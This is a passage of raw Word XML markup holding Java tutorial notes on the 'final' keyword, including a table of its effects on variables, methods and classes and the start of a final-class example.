          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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C4F1BA5" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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6422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xml:space="preserve">// num = 5; // </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E43740" w14:textId="77777777" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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6422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um</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647D716E" w14:textId="09B46F64" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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642254"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65120013" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5FBDF421">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99B8A8" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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6. final and static together</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E0A7A" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC769F" w14:textId="260BC52B" w:rsidR="00F00606" w:rsidRPr="00CE4B95"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2173"/>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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P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14159</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8ECB8" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F43C80">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="154B8CAD">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CE005F" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">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22"/>
        <w:gridCol w:w="4908"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="27D931EE" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F118D2" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F00606">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61522819" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F00606">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Effect of final</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="5E525E3C" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="525D520C" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61218759" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Value can't be changed after initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="48C9625B" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18F61C22" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A21341" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cannot be overridden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="01B9D7FB" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70CF0A4F" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51CB5CF4" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cannot be extended (no subclass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="5BB5DF0F" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="519F7BC5" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E5C0843" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reference can't be reassigned (but object can change)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="478D85A3" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B3B31DE" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58F4EF4F" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Value cannot be modified inside method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003210D" w:rsidRPr="00CE4B95" w14:paraId="09CB62FA" w14:textId="77777777" w:rsidTr="0003210D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B4C9330" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>static final</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B74B29" w14:textId="77777777" w:rsidR="0003210D" w:rsidRPr="00CE4B95" w:rsidRDefault="0003210D" w:rsidP="00F43C80">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Creates constants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47B90C88" w14:textId="6195291C" w:rsidR="000F5ACC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001967B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="50427AB8">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42711776" w14:textId="77777777" w:rsidR="000F5ACC" w:rsidRPr="00CE4B95" w:rsidRDefault="000F5ACC" w:rsidP="000F5ACC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc196307496"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I create the final class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="07F18829" w14:textId="2AA67A87" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="00A6391B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A final class in Java is a class that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be extended or inherited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531759D" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="00DB38FF">
      <w:pPr>
        <w:ind w:firstLine="360"/>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What happens when you create a final class?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579D1B1" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. You can use it as-is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E3BFA" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can create objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, call its methods, and use it like any regular class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BFD17" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Vehic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B9937F7" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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ru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004EC0E" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Vehicle is running"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E08915" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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BF7ED13" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
